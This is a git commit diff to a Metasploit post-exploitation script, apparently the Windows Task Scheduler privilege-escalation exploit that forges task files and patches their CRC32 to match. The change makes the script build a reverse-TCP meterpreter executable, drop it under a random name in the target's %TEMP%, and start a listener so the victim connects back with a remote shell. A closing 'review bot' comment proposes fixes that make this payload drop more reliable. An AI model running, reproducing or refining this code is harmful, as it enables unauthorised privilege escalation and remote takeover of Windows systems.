Fix errors with ESET and bwd_table not defined, and add the ability to automatically generate a reverse meterpreter payload.
git-svn-id: file:///home/svn/framework3/trunk@11152 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c45314bf4e
commit
8abdfe5ff2
|
@ -58,6 +58,8 @@ end
|
|||
"-h" => [ false, "Help menu." ],
|
||||
"-c" => [ true, "Execute the specified command" ],
|
||||
"-u" => [ true, "Upload and execute the specified file" ],
|
||||
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
|
||||
"-p" => [ true, "The port on the remote host where Metasploit is listening"],
|
||||
"-t" => [ true, "Use the specified task name" ]
|
||||
)
|
||||
|
||||
|
@ -67,6 +69,8 @@ def usage
|
|||
raise Rex::Script::Completed
|
||||
end
|
||||
|
||||
rhost = Rex::Socket.source_address
|
||||
rport = 4444
|
||||
taskname = nil
|
||||
cmd = nil
|
||||
upload_fn = nil
|
||||
|
@ -88,14 +92,45 @@ upload_fn = nil
|
|||
when "-h"
|
||||
usage
|
||||
|
||||
when "-r"
|
||||
rhost = val
|
||||
|
||||
when "-p"
|
||||
rport = val.to_i
|
||||
end
|
||||
}
|
||||
|
||||
# Must have at least one of -c or -u
|
||||
if not cmd and not upload_fn
|
||||
print_error("You must specify -c or -u")
|
||||
print_line('')
|
||||
usage
|
||||
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
|
||||
|
||||
# Get the exe payload.
|
||||
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
||||
pay.datastore['LHOST'] = rhost
|
||||
pay.datastore['LPORT'] = rport
|
||||
raw = pay.generate
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
#and placing it on the target in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
|
||||
cmd = tempdir + "\\" + tempexename + ".exe"
|
||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
|
||||
fd = client.fs.file.new(cmd, "wb")
|
||||
fd.write(exe)
|
||||
fd.close
|
||||
|
||||
#get handler to be ready
|
||||
handler = client.framework.exploits.create("multi/handler")
|
||||
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
|
||||
handler.datastore['LHOST'] = rhost
|
||||
handler.datastore['LPORT'] = rport
|
||||
handler.datastore['InitialAutoRunScript'] = "migrate -f"
|
||||
handler.datastore['ExitOnSession'] = false
|
||||
#start a handler to be ready
|
||||
handler.exploit_simple(
|
||||
'Payload' => handler.datastore['PAYLOAD'],
|
||||
'RunAsJob' => true
|
||||
)
|
||||
end
|
||||
|
||||
if cmd
|
||||
|
@ -133,12 +168,21 @@ if upload_fn
|
|||
cmd ||= location
|
||||
end
|
||||
|
||||
def crc32(data)
|
||||
table = Zlib.crc_table
|
||||
crc = 0xffffffff
|
||||
data.unpack('C*').each { |b|
|
||||
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
|
||||
}
|
||||
crc
|
||||
end
|
||||
|
||||
#
|
||||
# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
|
||||
# reversed from Microsoft's code)
|
||||
#
|
||||
bwd_table = [
|
||||
def fix_crc32(data, old_crc)
|
||||
#
|
||||
# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
|
||||
# reversed from Microsoft's code)
|
||||
#
|
||||
bwd_table = [
|
||||
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
|
||||
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
|
||||
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
|
||||
|
@ -203,18 +247,8 @@ bwd_table = [
|
|||
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
|
||||
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
|
||||
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
|
||||
]
|
||||
]
|
||||
|
||||
def crc32(data)
|
||||
table = Zlib.crc_table
|
||||
crc = 0xffffffff
|
||||
data.unpack('C*').each { |b|
|
||||
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
|
||||
}
|
||||
crc
|
||||
end
|
||||
|
||||
def fix_crc32(data, old_crc)
|
||||
crc = crc32(data[0, data.length - 12])
|
||||
data[-12, 4] = [crc].pack('V')
|
||||
|
||||
|
@ -288,7 +322,7 @@ end
|
|||
#
|
||||
# Record the crc32 for later calculations
|
||||
#
|
||||
old_crc32 = ESET.crc32(content)
|
||||
old_crc32 = crc32(content)
|
||||
print_status("Original CRC32: 0x%x" % old_crc32)
|
||||
|
||||
#
|
||||
|
@ -315,8 +349,8 @@ content = Rex::Text.to_unicode(content)
|
|||
#
|
||||
# Fix it so the CRC matches again
|
||||
#
|
||||
ESET.fix_crc32(content, old_crc32)
|
||||
new_crc32 = ESET.crc32(content)
|
||||
fix_crc32(content, old_crc32)
|
||||
new_crc32 = crc32(content)
|
||||
print_status("Final CRC32: 0x%x" % new_crc32)
|
||||
|
||||
#
|
||||
|
|
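Review bot: In the default-payload branch of the `@ -88,14 +92,45 @@` hunk, `cmd = tempdir + "\\" + tempexename + ".exe"` builds the dropped-exe path from an expanded `%TEMP%` without quoting, so a profile directory containing spaces (the `Documents and Settings` layout this escalation targets) will be split wherever `cmd` is later placed in the task's command line; `cmd` is consumed by the `if cmd` block that continues outside this hunk, so I cannot confirm it is quoted there. The new `-p` handling `rport = val.to_i` also accepts any string and silently turns a typo into LPORT 0, after which the exe is still written to the target; a bounded check such as `rport = val.to_i; usage unless (1..65535).include?(rport)` before the file is dropped would avoid that. Two points worth a comment in this branch: the random `.exe` left in `%TEMP%` is never removed and the `multi/handler` job started with `ExitOnSession = false` is never stopped, so both outlive the script, and `-r`/`-p` are silently ignored when `-c` or `-u` is supplied since they only matter on this path. The help text for `-r`/`-p` in the first hunk could state that they apply only when neither `-c` nor `-u` is given.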